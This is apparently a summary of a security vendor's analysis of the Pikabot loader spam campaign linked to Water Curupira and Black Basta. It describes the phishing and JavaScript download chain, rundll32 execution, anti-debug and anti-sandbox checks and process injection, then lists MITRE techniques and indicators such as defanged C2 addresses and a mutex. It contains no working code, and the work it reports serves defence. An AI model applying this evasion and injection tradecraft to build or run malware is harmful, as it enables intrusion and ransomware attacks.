Threat Research

Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign

TrendMicro

Water Curupira-affiliated spam campaigns in 2023 delivered the Pikabot loader via password-protected ZIP/IMG attachments and malicious PDFs, using obfuscated JavaScript and LNK files to retrieve and execute a DLL payload via rundll32.exe. The Pikabot DLL performs anti-analysis checks, decrypts and loads a core module from PNG resources, injects it into a suspended process, collects system data, and communicates with multiple C2 IPs, enabling follow-on deployment of Cobalt Strike and Black Basta activity. #Pikabot #WaterCurupira

Keypoints

  • Initial access is achieved through phishing emails using thread‑hijacking with password‑protected ZIP attachments (containing obfuscated JS or IMG) or malicious PDFs that link to JS downloaders.
  • Heavily obfuscated JavaScript attempts CMD execution, falls back to ping checks, and uses curl.exe to download the Pikabot DLL payload into randomized temp directories.
  • Alternate delivery uses an IMG containing an LNK and a Pikabot DLL; the LNK triggers rundll32.exe to run exported functions (e.g., “Limit” or “Crash”) that start the payload.
  • The 32‑bit Pikabot DLL decrypts and runs shellcode which checks for debuggers (NtQueryInformationProcess), decrypts another DLL, and runs anti‑sandbox checks by loading fake/security DLL names.
  • Pikabot reconstructs its core from encrypted PNG resources, creates a suspended SearchProtocolHost process, injects the core via indirect syscalls, and resolves APIs via hashes and GetProcAddress/LoadLibraryA.
  • The core gathers system and process/network information (whoami, ipconfig, netstat, process list), encrypts the data into JSON, stores interim data in a named pipe, and posts it to multiple C2 IPs/URLs.
  • Observed campaign context links Pikabot infections to dropping Cobalt Strike beacons and eventual Black Basta ransomware activity after initial access.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Initial access via password‑protected archives or attached IMG/PDF distributed in hijacked email threads (‘Pikabot … gains initial access to its victim’s machine through spam emails containing an archive or a PDF attachment’).
  • [T1566.002] Spearphishing Link – Use of malicious PDF content linking to a downloader that retrieves a JS payload (‘When the user selects the download button, it will attempt to access a malicious URL, then proceed to download a malicious JS file’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Malicious JS performs conditional command execution, array obfuscation and nested functions to retrieve and run payloads (‘The attached archive contains a heavily obfuscated JavaScript (JS) …’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The JS attempts to execute commands via cmd.exe and executes ping/echo fallbacks (‘The script attempts command execution using cmd.exe. … it echoes a designated string to the console and tries to ping a specified target’).
  • [T1105] Ingress Tool Transfer – Payload retrieval from external servers using curl.exe and multiple download URLs (‘the script employs Curl.exe to download the Pikabot payload from an external server, saving the file in the system’s temporary directory’).
  • [T1218.011] Signed Binary Proxy Execution: Rundll32.exe – Execution of the downloaded DLL payload via rundll32.exe using exported function names (‘it uses rundll32.exe to execute the downloaded Pikabot payload … with “Crash” as the export parameter’ / ‘rundll32.exe will be used to run the Pikabot DLL payload using an export parameter, “Limit”’).
  • [T1204.002] User Execution: Malicious File – Use of LNK files disguised as documents to trick users into launching the payload (‘an LNK file posing as a Word document … Once the victim is lured into executing the LNK file, rundll32.exe will be used to run the Pikabot DLL payload’).
  • [T1027] Obfuscated Files or Information – Heavy JS and array‑based obfuscation to conceal control flow and URLs (‘We discovered an additional variant of the malicious downloader that employed obfuscation methods involving array usage and manipulation’).
  • [T1497.001] Virtualization/Sandbox Evasion: Debugger Detection – Anti‑analysis by calling NtQueryInformationProcess to detect debugging and loading incorrect/junk libraries to detect sandboxes (‘the shellcode … identifies if the process is being debugged by calling the Windows API NtQueryInformationProcess … The decrypted DLL file will execute another anti‑analysis routine by loading incorrect libraries and other junk to detect sandboxes’).
  • [T1055] Process Injection – Injector creates a suspended process (SearchProtocolHost) and injects the core module using indirect system calls to hide injection (‘the Pikabot injector creates a suspended process (%System%SearchProtocolHost) and injects the core module into it. The injector uses indirect system calls to hide its injection’).
  • [T1082] System Information Discovery – The core gathers system details for exfiltration formatted as JSON (‘obtaining details about the victim’s system and forwarding them to a C&C server … The stolen data uses a JSON format’).
  • [T1057] Process Discovery – Enumerates running processes via CreateToolhelp32Snapshot, Process32First/Process32Next (‘A list of running processes on the system will also be gathered … by calling CreateToolHelp32Snapshot and listing processes through Process32First and Process32Next’).

Indicators of Compromise

  • [IP addresses] C2 endpoints observed in POST attempts – 70[.]34[.]209[.]101:13720, 137[.]220[.]55[.]190:2223, and 5 more IP:port entries.
  • [File names / payloads] Delivery & payload artifacts – examples include LNK (disguised as Word document), Pikabot DLL (exports ‘Limit’ / ‘Crash’), and password‑protected ZIP/IMG attachments.
  • [DLL names] Sandbox/anti‑analysis DLLs used for detection – cmdvrt.32.dll, avghookx.dll, and multiple other fake/real DLL names listed in the sandbox check table.
  • [Mutex] Single‑instance mutex used by core – {A77FC435-31B6-4687-902D-24153579C738}.
  • [URL path] C2 request path observed in exfiltration calls – ‘cervicobrachial/oIP7xH86DZ6hb?vermixUnintermixed=beatersVerdigrisy&backoff=9zFPSr’ (appended to the C2 IPs above).

Phishing emails used thread‑hijacking and delivered either a password‑protected ZIP (containing an obfuscated JavaScript or an IMG) or a PDF that links to a JS downloader. The JS attempts to run cmd.exe commands; if that fails it echoes/pings a string as a check, uses curl.exe to fetch a DLL payload into a randomly created temp directory, and ultimately executes the DLL via rundll32.exe with export parameters like “Crash” or “Limit”. An alternate chain extracts an IMG with an LNK and the Pikabot DLL and uses the LNK to invoke rundll32.exe directly.

The Pikabot DLL (32‑bit) exposes many exports and uses an export (e.g., “Limit”) to decrypt and run shellcode. The shellcode performs anti‑debug checks by calling NtQueryInformationProcess, decrypts a second DLL which runs anti‑sandbox routines (loading incorrect/junk libraries and fake security DLL names), and then loads encrypted PNG resources that contain the core module. After rebuilding the core, Pikabot spawns a suspended SearchProtocolHost process and injects the core using indirect system calls to evade detection.

At runtime the core resolves APIs via hashed lookups and GetProcAddress/LoadLibraryA, enforces single‑instance via a hardcoded mutex, checks system language to avoid Russian/Ukrainian targets, collects system and network data (whoami, ipconfig, netstat, process list via CreateToolhelp32Snapshot), stores intermediate data in a named pipe, encrypts the data into JSON, and posts it to multiple C2 IPs/URLs. These actions enable follow‑on deployment of remote access tools (Cobalt Strike) and potential Black Basta ransomware activity.

Read more: https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint